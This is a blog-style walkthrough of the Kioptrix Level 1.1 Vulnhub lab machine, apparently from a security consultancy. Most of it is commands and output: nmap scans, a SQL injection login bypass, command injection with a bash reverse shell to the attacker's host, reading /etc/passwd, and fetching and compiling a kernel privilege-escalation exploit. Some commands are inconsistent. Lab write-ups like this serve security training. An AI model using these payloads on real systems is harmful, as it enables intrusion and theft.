Cybersecurity: Kioptrix 1-1
Download our Whitepaper
We welcome you to download our Whitepaper for CyberSecurity. Basically our new department for cybersecurity will help you if you need cybersecurity consultation.
--------------------------------------------------------------------------------
SOLOMO : KIOPTRIX LEVEL 1-1
After installation of the Hackable machine from Kioptrix Level 1-1 for practice. Kioptrix is a boot to root challenge which you can download from?Vulnhub. You can download and install it on your virtual machine. i am using virtualbox
The methods that I will use this article will be as follows:
Installation method for Kioptrix to virtualbox is in this link: https://www.geeksforgeeks.org/how-to-install-kioptrix-level-1-on-virtualbox/
Methodology
Used Tools
So, let's start.
Turn on your attackinfg machine (Kioptrix 2.0 Virtual Machine) and scan the local network for getting the victim's IP address. You can use?netdiscover?command for that.
DISCOVERY
I use?netdiscover?to search for the IP address of the Kioptrix Level 1.1 (#2) VM:
nmap 192.168.18.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 15:48 EDT
Nmap scan report for 192.168.18.2
Host is up (0.14s latency).
Not shown: 994 closed tcp ports (reset)
PORT? ? ?STATE SERVICE
22/tcp? ?open? ssh
80/tcp? ?open? http
111/tcp? open? rpcbind
443/tcp? open? https
631/tcp? open? ipp
3306/tcp open? mysql
MAC Address: 08:00:27:38:97:10 (Oracle VirtualBox virtual NIC)
nmap -sC -sV 192.168.18.2
nmap -sC -sV 192.168.18.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 00:04 EDT
Nmap scan report for 192.168.18.2
Host is up (0.18s latency).
Not shown: 994 closed tcp ports (reset)
PORT? ? ?STATE SERVICE? VERSION
22/tcp? ?open? ssh? ? ? OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:?
|? ?1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|? ?1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_? 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp? ?open? http? ? ?Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp? open? rpcbind? 2 (RPC #100000)
| rpcinfo:?
|? ?program version? ? port/proto? service
|? ?100000? 2? ? ? ? ? ? 111/tcp? ?rpcbind
|? ?100000? 2? ? ? ? ? ? 111/udp? ?rpcbind
|? ?100024? 1? ? ? ? ? ? 950/udp? ?status
|_? 100024? 1? ? ? ? ? ? 953/tcp? ?status
443/tcp? open? ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2022-05-08T00:32:27+00:00; -3h33m02s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:? 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp? open? ipp? ? ? CUPS 1.1
3306/tcp open? mysql? ? MySQL (unauthorized)
MAC Address: 08:00:27:38:97:10 (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: -3h33m02s
?
Finding:
port 80 is open, using apache
Enumerating HTTP
Upon accessing the web server through a browser, the below login page is displayed:
Port 80:
We visit the webpage hosted on port 80
https://192.168.18.2:80
After trying a few common and/or default credentials to authenticate to no avail, decided to run a Nikto scan to gain more information about the target and any possible exploitation routes:
Till that time letz run a Gobuster in the background in order to find the hidden directories.
The scan did not identify anything useful sadly. The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:
gobuster dir -u https://192.168.18.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Exploiting SQL Injection and Remote Command Execution
It turns out the authentication can be bypassed by using the following payload in the username field:
magic super admin n magic super password
userid : admin' or 1=1# pw: admin' or 1=1#
admin' or 1=1#
This means the query used to perform the authentication will look like the following:
SELECT * FROM users WHERE username = admin' or 1=1--
since 1=1 is always true, the query will allow login to the web application. Commented the rest of the query just in case.
ls
index.php
pingit.php
This takes to a page that allows to ping other machines by entering the IP address:
This means there is possibility of RCE(Remote Code Execute) using a reverse shell. Letz check whether bash or python is installed on the victim machine
;bash --version
GNU bash, version 3.00.15(1)-release (i686-redhat-linux-gnu)
Copyright (C) 2004 Free Software Foundation, Inc.
We get the output. That means bash is installed on the machine so we can get a bash reverse shell.
;perl -v
This is perl, v5.8.5 built for i386-linux-thread-multi
Copyright 1987-2004, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at https://www.perl.com/, the Perl Home Page.
;whoami
;whoami
apache
***** we entered into the server********
Privilege Escalation
Command Injection
Once logged in, we’re greeted with a page that allow us to?“Ping a machine on the network”.
Let’s test the output of this page if we use
LISTEN FOR ACTION FROM HACKER MACHINE
Create a shell session in KALI MACHINE
Open a shell session:
In our terminal we use netcat in listening mode so that we can get the shell in our terminal
Bash
Some versions of?bash can send you a reverse shell?(this was tested on Ubuntu 10.10):
领英推荐
ENTER CODE IN VICTIM WEB APPLICATION
ping 192.168.18.13 ;bash -i >& /dev/tcp/192.168.18.13/1234 0>&1
my kali machine ip: 192.168.18.13
RESULT IN KALI MACHINE
nc -lvp 123
listening on [any] 1234 ...
192.168.18.15: inverse host lookup failed: Unknown host
connect to [192.168.18.13] from (UNKNOWN) [192.168.18.15] 32779
bash: no job control in this shell
bash-3.00$?
bash-3.00$ whoami
apache
bash-3.00$?
#####I AM INSIDE THE MACHINE
192.168.18.2 && ls -la
192.168.18.2 && ls -la
PING 192.168.18.2 (192.168.18.2) 56(84) bytes of data.
64 bytes from 192.168.18.2: icmp_seq=0 ttl=64 time=9.68 ms
64 bytes from 192.168.18.2: icmp_seq=1 ttl=64 time=42.0 ms
64 bytes from 192.168.18.2: icmp_seq=2 ttl=64 time=7.11 ms
--- 192.168.18.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2046ms
rtt min/avg/max/mdev = 7.119/19.607/42.021/15.883 ms, pipe 2
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1732 Oct 8 2009 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
;id
;id
uid=48(apache) gid=48(apache) groups=48(apache)
;ls /home #understand more about target machine userid
harold
john
;cat /etc/passwd #understand more about target machine password
;cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bashd
;uname -a #understand more about target machine
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
IN KALI MACHINE
cat /proc/version
(root?kali)-[~
└─# cat /proc/version
Linux version 5.15.0-kali3-amd64 ([email protected]) (gcc-11 (Debian 11.2.0-14) 11.2.0, GNU ld (GNU Binutils for Debian) 2.37.90.20220123) #1 SMP Debian 5.15.15-2kali1 (2022-01-31)
? ? ? ? ? ? ? ?]
searchsploit
According to searchsploit we have a potential local exploit we can use if we have shell on the system -?exploit 9545:
root@kali #searchsploit -m linux/local/9545.
Exploit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation? ? ? URL: https://www.exploit-db.com/exploits/9545? ? ?Path: /usr/share/exploitdb/exploits/linux/local/9545.cFile Type: C source, ASCII textCopied to: /root/9545.cc
Transferring the exploit to the target machine using the Python web server and Wget:
$ searchsploit Linux Kernel CentOS
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privi | linux_x86/local/42274.c
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Pr | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Esc | linux/local/9479.c
...
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Search google for the Kernel exploit.We got the exploit
https://www.exploit-db.com/exploits/9542
Copy the exploit path and copy the file to our local folder. We’ll need to upload it to the target later.
$ searchsploit -p 9545
Exploit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/9545
Path: /usr/share/exploitdb/exploits/linux/local/9545.c
File Type: C source, ASCII text, with CRLF line terminators
Create a Python Simpleserver to serve the file (Python3 command?is a bit different)
$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
PYTHON 3 CODE
python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (https://0.0.0.0:9000/) ...
On the target machine, using our open shell session, run curl to pull the exploit file using
curl https://192.168.18.13:9000/9545.c --output /tmp/9545.c?
bash-3.00$ curl https://192.168.18.13:9000/9545.c --output /tmp/9545.c? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
? % Total? ? % Received % Xferd? Average Speed? ?Time? ? Time? ? ?Time? Current
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?Dload? Upload? ?Total? ?Spent? ? Left? Speed
100? 9408? 100? 9408? ? 0? ? ?0? 29128? ? ? 0 --:--:-- --:--:-- --:--:-- 54068
?
Note:
We’re storing the file in the?/tmp?path as sometimes we might encounter permissions issues storing and accessing files in other directories.
Use?ls -la /tmp?to verify the file exists
bash-3.00$ ls -la /tmp
total 32
drwxr-xrwx 4 root root 4096 Jan 18 19:18 .
drwxr-xr-x 23 root root 4096 Jan 18 17:02 ..
-rw-r--r-- 1 apache apache 9783 Jan 18 19:17 9545.c
drwxrwxrwt 2 root root 4096 Jan 18 17:03 .font-unix
drwxrwxrwt 2 root root 4096 Jan 18 17:02 .ICE-unix
change directory to?/tmp, compile, run the exploit and check?whoami?to confirm the exploit worked
bash-3.00$ gcc -o my_exploit 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./my_exploit
sh: no job control in this shell
sh-3.00# whoami
root
Success! This has granted a root-level shell with full access to the machine.
METHOD 2
INSTALL GEDIT
apt install gedit
gedit 9545.c
?Copy paste the code in the file.
This exploit is an old exploit hence it throws error when we compile it with gcc compiler.And the flag -m64 was working in my case;so we choose “clang” which comes pre-installed in Kali linux.
clang -o exploit -m64 9545.c
Now letz place this exploit in our Apache server Directory
mv exploit /var/www/html
Letz start our Apache sever:
service apache2 start
Now in letz open our reverse shell and traverse to /tmp directory ;as this is the directory which has all the permissions(read,write,execute)
wget 192.168.18.2/exploit
ls
chmod 755 exploit. /exploit
Now run the exploit.
Who are we?
We are whitehat cybersecurity professionals that help companies to secure their companies against attack. In order to be a whitehatter, we need to be a hacker, to know how the hacker attack and then we deploy the defense against hacker.
Cybersecurity Approved Vendor for PSG grant for cybersecurity trustmark. Our Colleagues working in the Information Security Field from Singapore. Interested in network protocols and how to assess customer networks (or how to protect your networks from the bad guys)
Open to help the IS community.
Contact Us Whatsapp: 83827213